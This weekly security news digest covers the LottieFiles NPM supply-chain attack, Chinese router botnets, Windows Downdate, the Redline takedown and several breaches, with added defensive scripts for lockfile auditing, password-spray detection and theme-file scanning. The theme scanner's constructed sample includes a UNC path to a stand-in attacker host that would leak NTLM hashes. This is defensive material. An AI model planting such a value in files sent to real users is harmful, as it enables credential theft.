Weekly News Digest 28 October – 03 November

Supply chain attack hits LottieFiles users with crypto drainer malware

Unsuspecting cryptocurrency owners were recently hit by unexpected prompts asking them to connect their cryptocurrency wallets when visiting certain websites that use LottieFiles software-as-a-service platform to help serve animations. If the users connect their wallets as requested, they may inadvertently allow cryptocurrency drainer malware to steal funds and other digital assets from their wallets.

This occurred because an authentication token belonging to one of the LottieFiles developers was stolen and subsequently used to upload a poisoned JavaScript package to the NPM code repository, which is used by millions of developers worldwide. Users of the LottieFiles package unknowingly installed the poisoned version, which then executed the malicious code hidden inside it. Once the code runs and a wallet connection is made, the malware contacts a malicious domain, castleservices01[.]com, to receive commands for the attack.

According to LottieFiles, only versions 2.0.5, 2.0.6, and 2.0.7 of the NPM package were affected by the breach, and these have been removed. Files on other repositories and platforms, including GitHub, are not affected. Users of the player are advised either to stay with version 2.0.4 or to upgrade to 2.0.8, neither of which is affected by the issue.
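The practical question for a site owner is whether one of the three compromised versions is pinned anywhere in a project, including as a nested dependency pulled in by another package. The script below is an added example and not code from LottieFiles or from the original post; it walks a package-lock.json (both the flat "packages" map of lockfile versions 2 and 3 and the nested "dependencies" tree of version 1) and reports every copy of the player with its status. The npm package name @lottiefiles/lottie-player is an assumption, since the digest only says "the LottieFiles package"; the two lockfiles embedded at the bottom are constructed for the demonstration.

```python
import json
from typing import Iterator

# ASSUMPTION: the digest only says "the LottieFiles package"; this example takes the
# npm package name to be @lottiefiles/lottie-player. Adjust PACKAGE if yours differs.
PACKAGE = "@lottiefiles/lottie-player"
AFFECTED = {"2.0.5", "2.0.6", "2.0.7"}   # versions the digest names as compromised
SAFE = {"2.0.4", "2.0.8"}                # versions the digest names as unaffected


def _lock_entries(lock: dict) -> Iterator[tuple[str, str, str]]:
    """Yield (install_path, name, version) for every package in a package-lock.json.

    lockfileVersion 2 and 3 carry a flat "packages" map keyed by install path;
    lockfileVersion 1 (and v2, redundantly) carries a nested "dependencies" tree.
    Only one layout is walked so that nothing is reported twice.
    """
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if path == "":
                continue                      # the root project itself
            # scoped names keep their "@scope/" prefix after the last "node_modules/"
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield path, name, meta.get("version", "")
        return

    def walk(deps: dict, prefix: str) -> Iterator[tuple[str, str, str]]:
        for name, meta in deps.items():
            path = f"{prefix}node_modules/{name}"
            yield path, name, meta.get("version", "")
            yield from walk(meta.get("dependencies", {}), path + "/")

    yield from walk(lock.get("dependencies", {}), "")


def audit_lockfile(lock_text: str) -> list[dict]:
    """Report every copy of PACKAGE pinned in the lockfile, nested copies included."""
    findings = []
    for path, name, version in _lock_entries(json.loads(lock_text)):
        if name != PACKAGE:
            continue
        if version in AFFECTED:
            status = "AFFECTED"
        elif version in SAFE:
            status = "safe"
        else:
            status = "unknown"                # neither list; verify against the advisory
        findings.append({"path": path, "version": version, "status": status})
    return findings


# Constructed lockfiles for the demonstration (not real project files).
SAMPLE_LOCK_V3 = json.dumps({
    "name": "demo-site", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-site", "version": "1.0.0"},
        "node_modules/@lottiefiles/lottie-player": {"version": "2.0.6"},
        "node_modules/left-pad": {"version": "1.3.0"},
        # a second, nested copy pulled in by another dependency
        "node_modules/some-widget/node_modules/@lottiefiles/lottie-player": {"version": "2.0.4"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {"@lottiefiles/lottie-player": {"version": "2.0.7"}},
})

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOCK_V3
    for f in audit_lockfile(text):
        print(f"{f['status']:8} {f['version']:6} {f['path']}")
```

Run it against a real lockfile with `python audit_lottie.py package-lock.json`; a nested copy is reported with its full install path, which is what makes a "safe" top-level pin insufficient on its own.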

Pacific Rim: 5-year battle with Chinese hackers targeting network devices

Sophos has published a series of reports on how it has been battling Chinese threat actors for more than 5 years as they targeted networking devices worldwide.

The series of reports, dubbed Pacific Rim, details the cybersecurity company’s investigation into multiple China-based groups and how they exploit flaws in edge networking devices to install custom malware for surveillance, sabotage, and cyberespionage.

The attacks have targeted well-known manufacturers, including Fortinet, Barracuda, SonicWall, Check Point, D-Link, Cisco, Juniper, Netgear, Sophos, and more. Sophos attributed this activity to multiple Chinese threat actors, known as Dungbeetle (aka Volt Typhoon, Voltzite), Sheathminer (aka APT31, Violet Typhoon), and Grayfly (aka APT41, Brass Typhoon).

The researchers believe that many of the zero-day vulnerabilities used in the attacks are developed by Chinese researchers who not only share them with vendors, but also the Chinese government and associated state-sponsored threat actors.

More Chinese hackers building network with hacked routers

Researchers have blogged about a Chinese hacking group called Storm-0940, which is building a substantial small office and home office (SOHO) botnet using malware known as Quad7 (aka CovertNetwork-1658 or xlogin). An interesting feature of this group’s attacks is its use of low-rate password spraying, in which a targeted machine or account is hit with a password-spray attempt around once a day, a level that is unlikely to trigger any alarms.

However, despite the lethargic rate of the initial activity, once an attempt succeeds the attacker wastes little time in getting into the device and exploring the network to see what is available inside. They also establish a stronger foothold within the network by installing additional malware, opening a command shell on TCP port 7777, and downloading and installing a SOCKS5 server that listens on TCP port 11288.
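The reason a once-a-day spray slips past most alerting is that the usual rule counts failures per source per day, and one or a handful of attempts never crosses that bar. What does stand out is the shape of the activity over a longer window: one source touching many distinct accounts, with very few attempts against each. The script below is an added example, not code from the researchers or the original post; it runs both rules over a constructed authentication log (one attempt per line, TEST-NET addresses) to show the per-day burst rule flagging only a noisy but benign user while the long-window distinct-account rule catches the slow spray. The log format, thresholds and window length are assumptions to be tuned to your own telemetry.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Constructed log format for this example: one authentication attempt per line.
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\w+)$")


def build_sample_log() -> list[str]:
    """Constructed sample: a slow spray plus one noisy but benign user."""
    base = datetime(2024, 10, 1, 3, 0, tzinfo=timezone.utc)
    accounts = [f"user{i:02d}" for i in range(20)]
    lines = []
    # Sprayer at 203.0.113.7 (TEST-NET-3, constructed): 4 accounts per day for 7 days,
    # rotating through 20 accounts, so no account sees more than 2 attempts in total.
    for day in range(7):
        for j in range(4):
            ts = base + timedelta(days=day, minutes=17 * j)
            acct = accounts[(day * 4 + j) % len(accounts)]
            lines.append(f"{ts.isoformat()} src=203.0.113.7 user={acct} result=fail")
    # Legitimate user bob mistypes his password six times in ten minutes, then succeeds.
    for k in range(6):
        ts = base + timedelta(days=2, hours=6, minutes=k)
        lines.append(f"{ts.isoformat()} src=198.51.100.5 user=bob result=fail")
    ts = base + timedelta(days=2, hours=6, minutes=7)
    lines.append(f"{ts.isoformat()} src=198.51.100.5 user=bob result=success")
    return lines


def parse_events(lines) -> list[tuple]:
    """Turn log lines into (timestamp, src, user, result) tuples; unparsable lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]))
    return events


def per_day_burst_alerts(events, max_failures_per_day: int = 10) -> list[str]:
    """Classic rule: more than N failures from one source within a calendar day."""
    counts = Counter((src, ts.date()) for ts, src, _user, result in events if result == "fail")
    return sorted({src for (src, _day), n in counts.items() if n > max_failures_per_day})


def low_and_slow_spray_alerts(events, window: timedelta = timedelta(days=14),
                              min_distinct_accounts: int = 15, max_per_account: int = 2) -> list[dict]:
    """Slow-spray rule: within a sliding window, one source fails against many distinct
    accounts while hitting each of them only a few times. Reports the widest such window."""
    by_src = defaultdict(list)
    for ts, src, user, result in events:
        if result == "fail":
            by_src[src].append((ts, user))
    alerts = []
    for src, attempts in by_src.items():
        attempts.sort()
        best, start = None, 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1                    # slide the window forward
            per_user = Counter(u for _, u in attempts[start:end + 1])
            if len(per_user) >= min_distinct_accounts and max(per_user.values()) <= max_per_account:
                if best is None or len(per_user) > best["distinct_accounts"]:
                    best = {"src": src, "distinct_accounts": len(per_user),
                            "first": attempts[start][0], "last": attempts[end][0]}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    evts = parse_events(build_sample_log())
    print("burst rule  :", per_day_burst_alerts(evts, max_failures_per_day=5))
    print("slow spray  :", low_and_slow_spray_alerts(evts))
```

With the sample data the burst rule (at five failures a day) names only bob's address, because the sprayer never exceeds four attempts in a day; the slow-spray rule names the sprayer with twenty distinct accounts and ignores bob, whose six failures all target one account. The two rules are complementary and should both run.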

The attackers have been known to target devices from various companies including those from TP-Link, ASUS, Ruckus, Axentra, and Zyxel but are particularly successful with TP-Link devices, which provide the bulk of hacked routers in the network of compromised devices.

Chinese hackers are known for targeting internet-connected devices for building botnets. In September 2024, the Federal Bureau of Investigation (FBI) and partner agencies detailed their work against another Chinese threat actor known as Flax Typhoon, which resulted in the demise of a 260,000-device-strong botnet.

New attack technique reverts patched Windows systems to vulnerable state

A new attack technique can bypass Microsoft’s Driver Signature Enforcement (DSE) on fully patched Windows systems, leading to operating system (OS) downgrade attacks.

The attack involves a Windows OS downgrade technique that SafeBreach security researcher Alon Leviev demonstrated at Black Hat USA 2024 in August, and for which he developed an exploit tool called Windows Downdate. Leviev showed how an attacker, with admin-level access to a system, could tamper with the Windows Update process and revert fully patched Windows components.

The technique allows an attacker to install custom rootkits that can neutralize security controls, hide malicious processes and network activity, maintain persistence and stealth, and more.

Since Leviev’s demonstration, Microsoft has patched two vulnerabilities (CVE-2024-21302 and CVE-2024-38202) that the researcher exploited as part of the attack chain. However, Microsoft has not yet addressed the ability for an attacker with admin access to abuse the Windows Update process itself. A Microsoft spokesperson says the company is “actively developing mitigations to protect against these risks.”

Dutch police gain access to Redline, Meta infostealer servers

The Dutch National Police revealed on Monday (October 28) that they gained “full access” to all of the servers used by the Redline and Meta infostealers.

“On the 28th of October 2024 the Dutch National Police, working in close cooperation with the FBI and other partners of the international law enforcement task force Operation Magnus, disrupted operation of the Redline and Meta infostealers,” stated a website announcing the activity. “Involved parties will be notified, and legal actions are underway.”

Authorities say they are also in possession of all the Redline and Meta source code, as well as “license servers, REST-API-servers, panels, stealers, and Telegram bots.”

Dutch police revealed that both Meta and Redline shared the same infrastructure, meaning it is likely that the same operators are behind both projects.

France’s second-largest ISP breached, 19 million subscribers impacted

Free, France’s second-largest internet service provider (ISP), has confirmed it suffered a cyberattack over the weekend. The ISP made the announcement after purportedly stolen customer information was offered for sale on a cybercrime forum.

Free warned that customers’ personal information was compromised in the incident. The company said the attackers targeted an internal management tool and that the unauthorized access involved “personal data associated with the accounts of certain subscribers.” The affected subscribers have been or will be informed by email, Free said. The ISP added that passwords and bank card details were unaffected, as were the contents of any of its users’ communications.

While Free did not reveal how many customers were impacted by the breach, the disclosure followed a cybercriminal known as drussellx listing on a cybercrime forum what they claimed were two databases stolen from Free, affecting more than 19 million customers.

“The data breach affects 19.2 million customers and contains over 5.11 million IBAN numbers. It affects all Free Mobile and Freebox customers, and includes the IBANs of all 5.11 million Freebox subscribers,” the threat actor says.

As Windows NTLM phase-out continues, the hashes keep leaking

While New Technology LAN Manager (NTLM) is a technology that Microsoft is set to retire from Windows operating systems, it is still widely used on older Windows systems and as a fallback when Kerberos is unavailable. NTLM is widely regarded as an insecure alternative, and attackers frequently target it to capture NTLM hashes that can then be used to authenticate to servers and gain access.

Microsoft announced in late 2023 that NTLM was to be retired, and while that process continues, NTLM also continues to pose a headache for users. The latest NTLM problem was discovered by researchers looking at another vulnerability (CVE-2024-38030, CVSS 6.5), which Microsoft patched in July 2024.

However, despite the patch, there was still another previously unknown vulnerability in the way Windows handles Windows Theme files that could allow an attacker to trigger a network connection to an attacker-controlled server and expose the user’s NTLM credentials in the process. The user simply has to copy the malicious file onto the vulnerable system to trigger the issue.

At this time, there is no official CVE number or patch available for this issue. However, the researchers who discovered the issue created unofficial patches if users are willing to take a chance. Alternatively, users can apply a group policy to block the sending of NTLM hashes to remote servers.
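Until an official patch exists, a defender can at least triage theme files that arrive by mail or download. The script below is an added example, not code from the researchers or the original post. It parses a .theme file (INI format) and reports any value that points at a remote location, a UNC path such as \\host\share\... or a URL; the assumption, which the digest does not state, is that a malicious theme causes the outbound connection by referencing a remote resource in an image key such as BrandImage or Wallpaper. The scanner checks every value rather than a fixed key list, so it does not depend on that assumption being complete. The sample theme at the bottom is constructed, with a TEST-NET address standing in for the attacker host.

```python
import configparser
import re

# Values that point outside the local machine: UNC paths (\\host\share\...) or URLs.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
URL_RE = re.compile(r"^(https?|ftp|file)://", re.IGNORECASE)


def scan_theme(text: str) -> list[dict]:
    """Return every key in a .theme file whose value refers to a remote location."""
    # .theme files are INI: "; comment" lines, [Section] headers, key=value pairs.
    # interpolation=None keeps %SystemRoot% style values intact; strict=False tolerates
    # duplicate keys that some generated theme files contain.
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str                      # keep key case exactly as written
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        for key, value in cp.items(section):
            v = value.strip().strip('"')
            if UNC_RE.match(v) or URL_RE.match(v):
                findings.append({"section": section, "key": key, "value": v})
    return findings


# Constructed sample theme for the demonstration, not a real file. BrandImage points at
# a remote share on a TEST-NET-3 address; the other paths are ordinary local ones.
SAMPLE_THEME = r"""; Constructed sample theme, not a real file.
[Theme]
DisplayName=Example Theme
BrandImage=\\203.0.113.9\share\brand.png

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
Pattern=

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
"""

if __name__ == "__main__":
    import sys
    paths = sys.argv[1:]
    if not paths:
        for f in scan_theme(SAMPLE_THEME):
            print(f"[sample] [{f['section']}] {f['key']} -> {f['value']}")
    for p in paths:
        with open(p, encoding="utf-8", errors="replace") as fh:
            for f in scan_theme(fh.read()):
                print(f"{p}: [{f['section']}] {f['key']} -> {f['value']}")
```

A hit is a reason to quarantine the file and look for the corresponding outbound SMB or HTTP attempt from the host, not proof on its own. The scan complements the group policy the digest mentions: on Windows that policy is "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers", which, set to deny, stops the hash from being sent even when a file does trigger the connection.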

Russian national charged for developing Redline infostealer

The U.S. has charged a Russian national for his alleged role in developing the Redline information-stealing malware.

According to an unsealed criminal complaint from the Western District of Texas, Maxim Rudometov is one of the developers and administrators of Redline, a prevalent infostealer used by cybercriminals. Rudometov regularly accessed and managed Redline, and was associated with various cryptocurrency accounts used to receive and launder payments for the malware. Rudometov is charged with access device fraud, conspiracy to commit computer intrusion, and money laundering.

The unsealed charges and the additional detainment of two unnamed individuals by Dutch National Police are the latest outcomes of Operation Magnus, an international law enforcement operation aimed at disrupting the Redline and Meta infostealers.

New version of Android FakeCall Trojan shows it’s still under active development

A new version of an Android malware called FakeCall has been spotted in the wild. The Trojan is used by attackers to target Android phone users to carry out voice-based phishing (vishing) attacks in order to steal sensitive information relating to banking and financial institutions.

In the new version, the Trojan sets itself up as the default call handler when installed. This allows it to intercept and manage all incoming and outgoing phone calls. The Trojan can intercept calls for many different financial institutions, so if, for example, a victim tries to call their bank, the Trojan will intercept the call and divert it to a phone number controlled by the attacker designed to impersonate the institution being contacted.

The new version also uses the Android Accessibility Service to enable it to control the device UI and initiate fake user input gestures. There are also a Bluetooth listener and a screen monitoring service that are not yet fully implemented, indicating that the Trojan is still in development.

The backdoor functionality has also been improved with several capabilities added to enable the attacker to have better control over the device.

Protection
For the latest protection updates, please visit the Symantec Protection Bulletin.

Peru’s Interbank confirms breach following data leak

Interbank, a leading financial institution in Peru, has confirmed it suffered a data breach. The disclosure came after a threat actor leaked data stolen from Interbank online.

“We have identified that some data of a group of clients has been exposed by a third party without our authorization. In light of this situation, we immediately deployed additional security measures to protect the operations and information of our clients,” Interbank said on Wednesday (October 30).

Interbank claims that most of its operations are online and that its clients’ deposits are secure; however, customers have been reporting that the bank’s mobile app and online platforms have stopped working.

It is unclear how many of Interbank’s customers are affected by the breach. However, a threat actor known as kzoldyck claims that they have data belonging to “3 million customers” that includes full names, account IDs, birth dates, addresses, phone numbers, email addresses, and IP addresses, as well as credit card and CVV numbers, credit card expiry dates, information on bank transactions, and other sensitive information, including plaintext credentials. The hacker says they posted samples of the stolen data online after ransom negotiations with Interbank’s management failed.